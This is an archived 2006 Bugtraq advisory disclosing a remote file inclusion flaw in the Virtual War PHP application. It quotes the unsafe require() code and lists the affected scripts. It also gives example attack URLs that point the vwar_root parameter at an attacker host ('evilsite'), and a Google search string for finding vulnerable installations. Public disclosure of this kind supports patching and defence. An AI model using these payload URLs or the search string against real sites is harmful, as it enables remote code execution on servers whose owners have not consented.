| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: 8 Apr 2006 13:27:58 -0000 From: liz0@...mail.com To: bugtraq@...urityfocus.com Subject: Virtual War File İnclusion Virtual War File inclusion --------------------------------- Site:http://www.vwar.de/ Demo:http://www.vwar.de/demo/ --------------------------------------- File Żnclusion // get functions $vwar_root = "./"; require ($vwar_root . "includes/functions_common.php"); require ($vwar_root . "includes/functions_front.php"); Vwar_root parameter File inclusion Aut File war.php,stats.php,news.php,joinus.php,challenge.php,calendar.php,member.php,popup.php and all admin folder files --------------------------------------- example 1) http://victim.com/path/admin/admin.php?vwar_root=http://evilsite 2)(phpnuke module) http://victim.com/path/modules/vwar/admin/admin.php?vwar_root=http://evilsite ----------------------------------------- Credit:Liz0ziM E-mail:liz0@...mail.com Site:www.biyo.tk www.biyosecurity.be ----------------------------------------- google: "Powered by: Virtual War v1.5.0" inurl:"modules.php?name=vwar" ------------------------------------- Source: http://www.blogcu.com/Liz0ziM/431925/ http://liz0zim.no-ip.org/vwar.txt
Powered by blists - more mailing lists